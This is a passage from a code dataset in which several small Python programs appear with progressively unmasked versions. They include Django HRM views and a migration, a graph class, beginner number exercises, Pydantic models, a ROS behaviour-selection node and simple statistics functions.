Employee.objects.get(user = self.request.user.id)\n return context \n\n\nclass ListPerformanceView(ListView):\n model = Performance \n context_object_name = \"performances\"\n template_name = \"hrm/performance/performance_list.html\"\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context \n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = ('employee', 'start_date', 'finish_date', 'objective')\n success_message = \"Successfully! Updated an appraisal\"\n context_object_name = \"performance\"\n template_name = \"hrm/performance/performance_form.html\"\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = \"performance\"\n template_name = \"hrm/performance/performance_details.html\"\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = \"Successfully! Deleted an appraisal.\"\n success_url = reverse_lazy(\"hrm:perfom_list\")\n template_name = \"hrm/performance/performance_delete.html\"\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user = self.request.user.id)\n return context\n\n'''\nShowing an employees perfomance control\n'''\ndef show_employee_perfomance_control(request):\n check_user_login(request)\n employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)\n perform = Performance.objects.filter(employee = employee.id)\n print(perform)\n if perform is None:\n return HttpResponseRedirect(reverse(\"hrm:hrm_index\"))\n return render(request, \"hrm/performance/employee_performance.html\", {'employee': employee, 'performances': perform})\n\n\n'''\nEmployee Provide Notes for his perfomance\n'''\n\ndef perfomance_notes(request, pk):\n form = PerformanceForm(request.POST or None,instance = get_object_or_404(Performance, pk=pk))\n employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)\n if request.method == \"POST\":\n if form.is_valid():\n form.save()\n messages.success(request, \"Successfully! Added notes on what you have done.\")\n return HttpResponseRedirect(reverse('hrm:perfom_employee'))\n return render(request, \"hrm/performance/performance_notes.html\", {'form': form, 'employee': employee})\n\ndef appraisal(request, pk):\n perform = Performance.objects.get(id = pk)\n perform.status = 1\n perform.save()\n messages.success(request, \"Successfully! Appraised employee work....\")\n return HttpResponseRedirect(reverse('hrm:perfom_list'))\n",
"step-ids": [
7,
12,
17,
20,
21
]
}
|
[
7,
12,
17,
20,
21
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
class Migration(migrations.Migration):
dependencies = [
('notesapp', '0008_auto_20150819_1222'),
]
operations = [
migrations.RenameField(
model_name='note',
old_name='txtcolor',
new_name='text',
),
migrations.AlterField(
model_name='note',
name='created_date',
field=models.DateTimeField(default=datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc), editable=False),
),
]
|
normal
|
{
"blob_id": "51af54c55834c4bdb8e1cbe4ac55b86bdc61bf4d",
"index": 458,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('notesapp', '0008_auto_20150819_1222')]\n operations = [migrations.RenameField(model_name='note', old_name=\n 'txtcolor', new_name='text'), migrations.AlterField(model_name=\n 'note', name='created_date', field=models.DateTimeField(default=\n datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc),\n editable=False))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n dependencies = [('notesapp', '0008_auto_20150819_1222')]\n operations = [migrations.RenameField(model_name='note', old_name=\n 'txtcolor', new_name='text'), migrations.AlterField(model_name=\n 'note', name='created_date', field=models.DateTimeField(default=\n datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc),\n editable=False))]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('notesapp', '0008_auto_20150819_1222'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='note',\n old_name='txtcolor',\n new_name='text',\n ),\n migrations.AlterField(\n model_name='note',\n name='created_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 8, 19, 12, 25, 8, 579538, tzinfo=utc), editable=False),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class Graph():
def __init__(self, nvertices):
self.N = nvertices
self.graph = [[0 for column in range(nvertices)]
for row in range(nvertices)]
self.V = ['0' for column in range(nvertices)]
def nameVertex(self):
for i in range(self.N):
print("Qual o rotúlo do vértice %i?"%(i))
self.V[i]=input()
def setEdge(self,u,v,w):
self.graph[u][v]=w
self.graph[v][u]=w
def loadEdges(self):
for i in range(self.N):
for j in range(self.N):
if i>j:
print("Qual o peso entre %c e %c?"%
(self.V[i],self.V[j]))
self.setEdge(i,j,input())
print('Qual o número de vértices?')
n = int(input())
g = Graph(n)
g1 = Graph(n-1)
print(g.graph)
g.nameVertex()
g.loadEdges()
print(g.graph)
|
normal
|
{
"blob_id": "51a8b963047215bf864eb4a3e62beb5741dfbafe",
"index": 8572,
"step-1": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n\n def setEdge(self, u, v, w):\n self.graph[u][v] = w\n self.graph[v][u] = w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i > j:\n print('Qual o peso entre %c e %c?' % (self.V[i], self.V[j])\n )\n self.setEdge(i, j, input())\n\n\n<mask token>\n",
"step-3": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n\n def setEdge(self, u, v, w):\n self.graph[u][v] = w\n self.graph[v][u] = w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i > j:\n print('Qual o peso entre %c e %c?' % (self.V[i], self.V[j])\n )\n self.setEdge(i, j, input())\n\n\nprint('Qual o número de vértices?')\n<mask token>\nprint(g.graph)\ng.nameVertex()\ng.loadEdges()\nprint(g.graph)\n",
"step-4": "class Graph:\n\n def __init__(self, nvertices):\n self.N = nvertices\n self.graph = [[(0) for column in range(nvertices)] for row in range\n (nvertices)]\n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print('Qual o rotúlo do vértice %i?' % i)\n self.V[i] = input()\n\n def setEdge(self, u, v, w):\n self.graph[u][v] = w\n self.graph[v][u] = w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i > j:\n print('Qual o peso entre %c e %c?' % (self.V[i], self.V[j])\n )\n self.setEdge(i, j, input())\n\n\nprint('Qual o número de vértices?')\nn = int(input())\ng = Graph(n)\ng1 = Graph(n - 1)\nprint(g.graph)\ng.nameVertex()\ng.loadEdges()\nprint(g.graph)\n",
"step-5": "class Graph(): \n \n def __init__(self, nvertices): \n self.N = nvertices \n self.graph = [[0 for column in range(nvertices)] \n for row in range(nvertices)] \n self.V = ['0' for column in range(nvertices)]\n\n def nameVertex(self):\n for i in range(self.N):\n print(\"Qual o rotúlo do vértice %i?\"%(i))\n self.V[i]=input()\n\n def setEdge(self,u,v,w):\n self.graph[u][v]=w\n self.graph[v][u]=w\n\n def loadEdges(self):\n for i in range(self.N):\n for j in range(self.N):\n if i>j:\n print(\"Qual o peso entre %c e %c?\"%\n (self.V[i],self.V[j]))\n self.setEdge(i,j,input())\n \n \n\n \nprint('Qual o número de vértices?')\nn = int(input())\ng = Graph(n)\ng1 = Graph(n-1)\nprint(g.graph)\ng.nameVertex()\ng.loadEdges()\nprint(g.graph)\n\n\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
##armstrong number##
##n= int(input('enter a number '))
##a=n
##s=0
##
##while n>0:
## rem= n%10
## s= s+rem*rem*rem
## n= n//10
##if a==s:
## print(a,' is an armstrong number')
##else:
## print(a,' is not an armstrong number')
##palindrome or not##
##n= int(input('enter a number '))
##a=n
##rev=0
##
##while n>0:
## rem= n%10
## rev= rev*10+rem
## n= n//10
##if a==rev:
## print(a,' is a palindrome number')
##else:
## print(a,' is not a palindrome number')
##factorial of a number using while loop##
##n= int(input('enter a number '))
##i=1
##a=n
##fact=1
##
##while i<=n:##n>0
## fact*= n*i##fact*=n
## n-=1
##print(fact,' is the factorial of ',a)
##factorial of a number using for loop##
##n= int(input('enter a number '))
##a=n
##fact=1
##
##for i in range(1,n+1):##(n,0,-1)
## fact*=i
##print(fact,' is the factorial of ',a)
##harshed number ##
##n= int(input('enter a number '))
##a=n
##s=0
##
##while n>0:
## rem= n%10
## s+=rem
## n//=10
##print(s,' is the sum of ',a)
##if a%s==0:
## print(a,' is a harshed number')
##else:
## print(a,' is not a harshed number')
##fibonocci series using while loop##
##n= int(input('enter a range '))
##a=0
##b=1
##print(a,b,end=" ")
##count=3
##
##while count<=n:
## s= a+b
## print(s,end=" ")
## a=b
## b=s
## count+=1
##fibonocci series using for loop##
##n= int(input('enter a range '))
##a=0
##b=1
##print(a,b,end=' ')
##
##for count in range(1,n-1):##(2,n)
## s= a+b
## print(s,end=' ')
## a=b
## b=s
##previous number of fibnocci series from the given number##
##n= int(input('enter a number '))
##a=0
##b=1
##for i in range(3,n+1):
## s=a+b
## a=b
## b=s
## if b>=n:
## print(a)
## break
##next number of fibnocci series from the given number##
##n= int(input('enter a number '))
##a=0
##b=1
##for i in range(3,n+1):
## s=a+b
## a=b
## b=s
## if b>=n:
## print(b)
## break
##perfect numbers using for loop##
##n= int(input('enter a number '))
##a=n
##s=0
##
##for i in range(1,n):#(1,(n//2)+1)#
## div=n%i
## if n%i==0:
## s+=i
## else:
## continue
##
##if s==a:
## print(a,' is a perfect number')
##else:
## print(a,' is not a perfect number')
##perfect numbers using while loop##
##n= int(input('enter a number '))
##a=n
##s=0
##i=1
##
##while i<n:
## if n%i==0:
## s+=i
## i+=1
##
##if s==a:
## print(a,' is a perfect number')
##else:
## print(a,' is not a perfect number')
|
normal
|
{
"blob_id": "6be285f9c48a20934c1846785232a73373c7d547",
"index": 1043,
"step-1": "##armstrong number##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##\r\n##while n>0:\r\n## rem= n%10\r\n## s= s+rem*rem*rem\r\n## n= n//10\r\n##if a==s:\r\n## print(a,' is an armstrong number')\r\n##else:\r\n## print(a,' is not an armstrong number')\r\n\r\n\r\n\r\n\r\n\r\n##palindrome or not##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##rev=0\r\n##\r\n##while n>0:\r\n## rem= n%10\r\n## rev= rev*10+rem\r\n## n= n//10\r\n##if a==rev:\r\n## print(a,' is a palindrome number')\r\n##else:\r\n## print(a,' is not a palindrome number')\r\n\r\n\r\n\r\n\r\n\r\n##factorial of a number using while loop##\r\n##n= int(input('enter a number '))\r\n##i=1\r\n##a=n\r\n##fact=1\r\n##\r\n##while i<=n:##n>0\r\n## fact*= n*i##fact*=n\r\n## n-=1\r\n##print(fact,' is the factorial of ',a)\r\n\r\n\r\n\r\n\r\n\r\n##factorial of a number using for loop##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##fact=1\r\n##\r\n##for i in range(1,n+1):##(n,0,-1)\r\n## fact*=i\r\n##print(fact,' is the factorial of ',a)\r\n \r\n\r\n\r\n\r\n\r\n##harshed number ##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##\r\n##while n>0:\r\n## rem= n%10\r\n## s+=rem\r\n## n//=10\r\n##print(s,' is the sum of ',a)\r\n##if a%s==0:\r\n## print(a,' is a harshed number')\r\n##else:\r\n## print(a,' is not a harshed number')\r\n\r\n\r\n\r\n\r\n\r\n##fibonocci series using while loop##\r\n##n= int(input('enter a range '))\r\n##a=0\r\n##b=1\r\n##print(a,b,end=\" \")\r\n##count=3\r\n##\r\n##while count<=n:\r\n## s= a+b\r\n## print(s,end=\" \")\r\n## a=b\r\n## b=s\r\n## count+=1\r\n\r\n\r\n\r\n\r\n\r\n##fibonocci series using for loop##\r\n##n= int(input('enter a range '))\r\n##a=0\r\n##b=1\r\n##print(a,b,end=' ')\r\n##\r\n##for count in range(1,n-1):##(2,n)\r\n## s= a+b\r\n## print(s,end=' ')\r\n## a=b\r\n## b=s\r\n\r\n\r\n\r\n\r\n\r\n##previous number of fibnocci series from the given number##\r\n##n= int(input('enter a number '))\r\n##a=0\r\n##b=1\r\n##for i in range(3,n+1):\r\n## s=a+b\r\n## a=b\r\n## b=s\r\n## if b>=n:\r\n## print(a)\r\n## break\r\n\r\n\r\n\r\n\r\n\r\n##next number of fibnocci series from the given number##\r\n##n= int(input('enter a number '))\r\n##a=0\r\n##b=1\r\n##for i in range(3,n+1):\r\n## s=a+b\r\n## a=b\r\n## b=s\r\n## if b>=n:\r\n## print(b)\r\n## break\r\n\r\n\r\n\r\n\r\n\r\n##perfect numbers using for loop##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##\r\n##for i in range(1,n):#(1,(n//2)+1)#\r\n## div=n%i\r\n## if n%i==0:\r\n## s+=i\r\n## else:\r\n## continue\r\n## \r\n##if s==a:\r\n## print(a,' is a perfect number')\r\n##else:\r\n## print(a,' is not a perfect number')\r\n\r\n\r\n\r\n\r\n\r\n##perfect numbers using while loop##\r\n##n= int(input('enter a number '))\r\n##a=n\r\n##s=0\r\n##i=1\r\n##\r\n##while i<n:\r\n## if n%i==0:\r\n## s+=i\r\n## i+=1\r\n## \r\n##if s==a:\r\n## print(a,' is a perfect number')\r\n##else:\r\n## print(a,' is not a perfect number')\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
<|reserved_special_token_0|>
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
class Config:
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BinBase(BaseModel):
name: str = None
title: str = None
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
class Config:
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
from typing import List
from pydantic import BaseModel
class BinBase(BaseModel):
name: str = None
title: str = None
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
class Config:
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
class Config:
orm_mode = True
<|reserved_special_token_1|>
from typing import List
from pydantic import BaseModel
class BinBase(BaseModel):
name: str = None
title: str = None
class BinCreate(BinBase):
owner_id: int
password: str
class Bin(BinBase):
id: int
# TODO: token?
class Config():
orm_mode = True
class UserBase(BaseModel):
username: str
class UserCreate(UserBase):
password: str
class User(UserBase):
id: int
# TODO: password?
# bins: List[Bin] = []
class Config():
orm_mode = True
|
flexible
|
{
"blob_id": "1c0f194bbdc6f7e3e4feb114e521aa958f11e83e",
"index": 3263,
"step-1": "<mask token>\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-2": "<mask token>\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n\n\n class Config:\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-3": "<mask token>\n\n\nclass BinBase(BaseModel):\n name: str = None\n title: str = None\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n\n\n class Config:\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-4": "from typing import List\nfrom pydantic import BaseModel\n\n\nclass BinBase(BaseModel):\n name: str = None\n title: str = None\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n\n\n class Config:\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n\n\n class Config:\n orm_mode = True\n",
"step-5": "from typing import List\nfrom pydantic import BaseModel\n\nclass BinBase(BaseModel):\n name: str = None\n title: str = None\n\n\nclass BinCreate(BinBase):\n owner_id: int\n password: str\n\n\nclass Bin(BinBase):\n id: int\n # TODO: token?\n\n class Config():\n orm_mode = True\n\n\nclass UserBase(BaseModel):\n username: str\n\n\nclass UserCreate(UserBase):\n password: str\n\n\nclass User(UserBase):\n id: int\n # TODO: password?\n # bins: List[Bin] = []\n\n class Config():\n orm_mode = True\n",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
#! /usr/bin/env python
# import ros stuff
import rospy
from std_srvs.srv import *
#to check if the service is active
active_ = False
def unable_service(req):
"""
This function contains the variable declared above that is
used to enable the service.
"""
global active_
active_ = req.data
res = SetBoolResponse()
res.success = True
res.message = 'Done!'
return res
def getInput():
"""
This function get the input, given by the user, on which of the 5
behaviors proposed, the robot must follow.
If one of the input chosen by the user is already active, the
function doesn't ask to give again the input.
"""
global active_
#to disable the service
active_ = False
# reading the previous input
prev_input_ = rospy.get_param('/input')
input_ = prev_input_
#in order to make the user to choose one of the 5 possible inputs
while (prev_input_ == input_) or (input_ > 5 or input_ < 1):
if input_ > 5 or input_ < 1:
#in the case in which the user make another selection
print "Unknown input, please try again"
#propose to the user which are the real possibilities
print("Please select one of the following senteces\n")
print("1 - Move the robot randomly in the environment, by choosing one of six possible target positions\n")
print("2 - The user can chose the next target position\n")
print("3 - Start following the external walls\n")
print("4 - Stop the robot in the last position\n")
print("5 - Change the planning algorithm from move_base to bug0 and vice versa\n")
#read the input typed by the user
input_ = (int(raw_input("Please select a number between 1 and 5: ")))
#set the choice made by the user
if input_ >= 1 and input_ <= 5:
rospy.set_param('/input', input_)
def main():
"""
The main function allows the user to choose the robot's behavior.
If the service is active it call the function getInput that allows
the user to make a new choice. If it is not, it check if the selected
behavior is the second one and in that case change it with the fourth one.
"""
global active_
#init user_interface
rospy.init_node('user_interface')
#service that allows the user to choose a new input
srv_user_interface = rospy.Service('/user_interface_service', SetBool, unable_service)
rate = rospy.Rate(1)
while not rospy.is_shutdown():
#if the service is not active
if not active_:
rate.sleep()
#if the selected behavior is the second one
if rospy.get_param("/input") == 2:
#change it in the fourth behavior
rospy.set_param("/input",4)
continue
#if the service is active
else:
getInput() # allow the user to choose a new behaviour
rate.sleep()
if __name__ == '__main__':
try:
main()
except rospy.ROSInterruptException:
pass
|
normal
|
{
"blob_id": "0f6737b9e9e9a13d75c20352e9ef9c1db6c0c8a3",
"index": 828,
"step-1": "#! /usr/bin/env python\n\n# import ros stuff\nimport rospy\nfrom std_srvs.srv import *\n\n#to check if the service is active\nactive_ = False\n\ndef unable_service(req):\n\t\"\"\"\n\tThis function contains the variable declared above that is\n\tused to enable the service.\n\t\"\"\"\n\tglobal active_\n \n\tactive_ = req.data\n\tres = SetBoolResponse()\n\tres.success = True\n\tres.message = 'Done!'\n\n\treturn res\n\t\ndef getInput():\n\t\"\"\"\n\tThis function get the input, given by the user, on which of the 5\n\tbehaviors proposed, the robot must follow.\n\tIf one of the input chosen by the user is already active, the \n\tfunction doesn't ask to give again the input.\n\t\"\"\"\t\n\tglobal active_\n\n\t#to disable the service \n\tactive_ = False \n\t\n\t# reading the previous input\n\tprev_input_ = rospy.get_param('/input')\n\tinput_ = prev_input_\n\t\n\t#in order to make the user to choose one of the 5 possible inputs\n\twhile (prev_input_ == input_) or (input_ > 5 or input_ < 1):\n\t\tif input_ > 5 or input_ < 1: \n\t\t\t#in the case in which the user make another selection\n\t\t\tprint \"Unknown input, please try again\" \n\t\t\n\t\t#propose to the user which are the real possibilities\n\t\tprint(\"Please select one of the following senteces\\n\")\n\t\tprint(\"1 - Move the robot randomly in the environment, by choosing one of six possible target positions\\n\")\n\t\tprint(\"2 - The user can chose the next target position\\n\")\n\t\tprint(\"3 - Start following the external walls\\n\")\n\t\tprint(\"4 - Stop the robot in the last position\\n\")\n\t\tprint(\"5 - Change the planning algorithm from move_base to bug0 and vice versa\\n\")\n\n\t\t#read the input typed by the user\t\n\t\tinput_ = (int(raw_input(\"Please select a number between 1 and 5: \")))\n\n\t#set the choice made by the user\n\tif input_ >= 1 and input_ <= 5:\n\t\trospy.set_param('/input', input_)\n\ndef main():\n\t\"\"\"\t\n\tThe main function allows the user to choose the robot's behavior.\n\tIf the service is active it call the function getInput that allows\n\tthe user to make a new choice. If it is not, it check if the selected\n\tbehavior is the second one and in that case change it with the fourth one.\n\t\"\"\"\n\tglobal active_\n\t\n\t#init user_interface\n\trospy.init_node('user_interface')\n\n\t#service that allows the user to choose a new input\n\tsrv_user_interface = rospy.Service('/user_interface_service', SetBool, unable_service)\n\t\n\trate = rospy.Rate(1)\n\twhile not rospy.is_shutdown():\n\t\t#if the service is not active\n\t\tif not active_: \n\t\t\trate.sleep()\n\t\t\t\n\t\t\t#if the selected behavior is the second one\n\t\t\tif rospy.get_param(\"/input\") == 2:\n\t\t\t\t#change it in the fourth behavior\n\t\t\t\trospy.set_param(\"/input\",4) \n\t\t\t\n\t\t\tcontinue\n\t\t\n\t\t#if the service is active\t\n\t\telse: \n\t\t\tgetInput() # allow the user to choose a new behaviour\n\t\t\n\t\trate.sleep()\n\t\t\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
<|reserved_special_token_0|>
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
<|reserved_special_token_0|>
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
def variation_coefficient(list):
return dispersion(list) ** (1 / 2) / np.mean(list) * 100
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
import numpy as np
from math import ceil, log2
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
def variation_coefficient(list):
return dispersion(list) ** (1 / 2) / np.mean(list) * 100
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if j > i * step and j <= (i + 1) * step:
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))
return 0.8 <= chi <= 16.8
<|reserved_special_token_1|>
import numpy as np
from math import ceil, log2
def avg(list):
return np.mean(list)
def dispersion(list):
res = 0
for i in list:
res += (i - np.mean(list)) ** 2
return res / len(list)
def variation_coefficient(list):
return (dispersion(list) ** (1/2) / np.mean(list)) * 100
def chi_square(list):
b = sorted(list)
k = ceil(log2(len(list)) + 1)
step = 10000 / k
p = 1 / k
frequency_vector = []
for i in range(k):
counter = 0
for j in b:
if (j > i * step) and (j <= (i + 1) * step):
counter += 1
else:
continue
frequency_vector.append(counter)
chi = 0
for i in range(k):
chi += ((frequency_vector[i] - p * len(list)) ** 2) / (p * len(list))
return 0.8 <= chi <= 16.8
|
flexible
|
{
"blob_id": "f2b978b9a4c00469cdd2f5e1e9275df73c7379b8",
"index": 3904,
"step-1": "<mask token>\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\n<mask token>\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-2": "<mask token>\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\n<mask token>\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-3": "<mask token>\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\ndef variation_coefficient(list):\n return dispersion(list) ** (1 / 2) / np.mean(list) * 100\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
"step-4": "import numpy as np\nfrom math import ceil, log2\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\ndef variation_coefficient(list):\n return dispersion(list) ** (1 / 2) / np.mean(list) * 100\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n frequency_vector = []\n for i in range(k):\n counter = 0\n for j in b:\n if j > i * step and j <= (i + 1) * step:\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += (frequency_vector[i] - p * len(list)) ** 2 / (p * len(list))\n return 0.8 <= chi <= 16.8\n",
